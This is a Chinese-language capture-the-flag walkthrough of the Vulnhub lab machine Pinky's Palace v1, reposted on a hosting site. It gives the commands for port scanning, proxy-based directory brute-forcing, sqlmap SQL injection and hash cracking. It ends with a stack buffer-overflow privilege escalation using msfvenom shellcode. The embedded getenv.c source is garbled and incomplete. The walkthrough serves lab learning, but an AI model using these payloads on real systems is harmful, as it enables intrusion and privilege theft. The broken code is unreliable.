[Vulnhub] Pinkys-PalaceV1 Squid http proxy+SQI+BOF

2024-07-16 1061阅读

信息收集

IP Address	Opening Ports
192.168.8.106	TCP:8080,31337,64666

$ nmap -p- 192.168.8.106 --min-rate 1000 -sC -sV

PORT      STATE SERVICE    VERSION
8080/tcp  open  http       nginx 1.10.3
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.10.3
31337/tcp open  http-proxy Squid http proxy 3.5.23
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.23
64666/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
|   2048 df:02:12:4f:4c:6d:50:27:6a:84:e9:0e:5b:65:bf:a0 (RSA)
|   256 0a:ad:aa:c7:16:f7:15:07:f0:a8:50:23:17:f3:1c:2e (ECDSA)
|_  256 4a:2d:e5:d8:ee:69:61:55:bb:db:af:29:4e:54:52:2f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

$ curl http://127.0.0.1:8080 -x 192.168.8.106:31337

目录爆破

$ dirb http://127.0.0.1:8080 /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -p 192.168.8.106:31337

$ gobuster dir -u "http://127.0.0.1:8080/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt --proxy http://192.168.8.106:31337

http://127.0.0.1:8080/littlesecrets-main/

SQLI

$ sqlmap --proxy=http://192.168.8.106:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php --level=5 --risk=3 --dump users

+-----+----------------------------------+-------------+
| uid | pass                             | user        |
+-----+----------------------------------+-------------+
| 1   | f543dbfeaf238729831a321c7a68bee4 | pinky       |
| 2   | d60dffed7cc0d87e1f4a11aa06ca73af | pinkymanage |
+-----+----------------------------------+-------------+

$ hashcat -m 0 -a 0 'd60dffed7cc0d87e1f4a11aa06ca73af' /usr/share/wordlists/rockyou.txt --force

username:pinkymanage

password:3pinkysaf33pinkysaf3

SSH

$ ssh pinkymanage@192.168.8.106 -p 64666

pinkymanage@pinkys-palace:~$ cat /var/www/html/littlesecrets-main/ultrasecretadminf1l35/note.txt

pinkymanage@pinkys-palace:~$ cat /var/www/html/littlesecrets-main/ultrasecretadminf1l35/.ultrasecret|base64 -d

$ ssh -i ./id_rsa pinky@192.168.8.106 -p 64666

权限提升&BOF

方法 1

$ gdb -q ./adminhelper

(gdb) break main

(gdb) run 1

(gdb) jump spawn

(gdb) info functions spawn

(gdb) run $(python -c "print 'A'*72")

通过测试缓冲区溢出为72

(gdb) run $(python -c "print 'A'*72+'B'*4")

(gdb) run $(python -c "print 'A'*72+'\xd0\x47\x55\x55\x55\x55\x00\x00'")

$ ./adminhelper $(python -c "print 'A'*72+'\xd0\x47\x55\x55\x55\x55\x00\x00'")

99975cfc5e2eb4c199d38d4a2b2c03ce

方法 2

$ msfvenom -a x64 -p linux/x64/exec CMD=/bin/sh -b '\x00\x0b\x0d\x0a\x18\x0c\x23\x24\x28\x29' | hexdump -v -e '"\\\x" 1/1 "%02x"'

$ export maptnh=`python -c 'print "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\xa1\x12\x80\xb5\xc8\x09\xbf\x96\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xe9\xaa\xaf\xd7\xa1\x67\x90\xe5\xc9\x12\x19\xe5\x9c\x56\xed\xf0\xc9\x3f\xe3\xe1\x96\x5b\x57\x9e\xa1\x12\x80\x9a\xaa\x60\xd1\xb9\xd2\x7a\x80\xe3\x9f\x5d\xe1\xfc\x9a\x4a\x8f\xb0\xc8\x09\xbf\x96"'`

/*getenv.c*/
#include 
#include 
#include 
int main(int argc, char *argv[]) {
	char *ptr;
	if(argc  
$ gcc -o getenv getenv.c 
$ ./getenv maptnh ~/adminhelper 
 
$ ~/adminhelper $(python -c "print 'A'*72+'\xaf\xee\xff\xff\xff\x7f'")

VPS购买请点击我

免责声明：我们致力于保护作者版权，注重分享，被刊用文章因无法核实真实出处，未能及时与作者取得联系，或有版权异议的，请联系管理员，我们会立即处理! 部分文章是来自自研大数据AI进行生成,内容摘自(百度百科,百度知道,头条百科,中国民法典,刑法,牛津词典,新华词典,汉语词典,国家院校,科普平台)等数据,内容仅供学习参考,不准确地方联系删除处理! 图片声明：本站部分配图来自人工智能系统AI生成,觅知网授权图片,PxHere摄影无版权图库和百度，360，搜狗等多加搜索引擎自动关键词搜索配图，如有侵权的图片，请第一时间联系我们，邮箱：ciyunidc@ciyunshuju.com。本站只作为美观性配图使用,无任何非法侵犯第三方意图,一切解释权归图片著作权方,本站不承担任何责任。如有恶意碰瓷者,必当奉陪到底严惩不贷!

[Vulnhub] Pinkys-PalaceV1 Squid http proxy+SQI+BOF

信息收集

目录爆破

SQLI

SSH

权限提升&BOF

方法 1

方法 2

相关阅读

怎么把织梦的模板替换?

dedecms怎么调用特定的栏目文档?

怎么抓包一个网页?

wap怎么封装app?

目录[+]